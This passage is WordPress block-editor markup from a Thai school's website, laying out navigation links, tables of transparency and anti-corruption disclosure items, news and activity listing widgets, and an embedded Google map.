data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline 